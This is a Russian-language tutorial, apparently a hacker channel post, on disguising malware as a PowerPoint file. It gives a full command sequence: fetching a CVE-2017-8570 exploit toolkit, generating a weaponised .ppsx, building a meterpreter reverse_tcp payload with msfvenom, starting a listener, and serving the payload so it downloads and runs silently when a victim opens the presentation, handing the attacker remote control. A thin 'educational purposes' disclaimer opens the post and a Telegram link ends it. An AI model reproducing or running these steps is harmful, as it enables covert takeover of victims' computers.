Маскировка вируса под PowerPoint

Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.

Что нам понадобится:

1. Kali linux
2. Metasploit
3. Знание базовых команд линукс

Начинаем:

1) Скачиваем эксплойт с GitHub->https://github.com/tezukanice/Office8570

2) Переходим в папку эксплойта:

cd Office8570

3) Создаём папку "template" (Понадобится для успешной генерации ppsx файла)

mkdir template

4)Переносим файл template.ppsx(он находится в папке, которую мы скачали)

cp template.ppsx template/

5)Создаём сам сaм .ppsx файл( имя презентации меняется здесь )

python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc

Файл презентации мы сделали, нo в него нужно вшить вирус(полезную нагрузку)

7)Создадим Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe

8) Запускаем слушатель, который сообщит и получит управление после открытия файла жертвой.

msfconsole -x «use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run»

9)Запускаем сервер

python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe

Принцип работы

После открытия презентации жертвой вирус начинает незаметно скачиваться, а затем компьютер автоматически запускает его. После этого в консоли откроется сессия и вы сможете управлять компьютером жертвы.

BTC-Чек BTC-Чек BTC-Чек

https://t.me/h4ckers_zone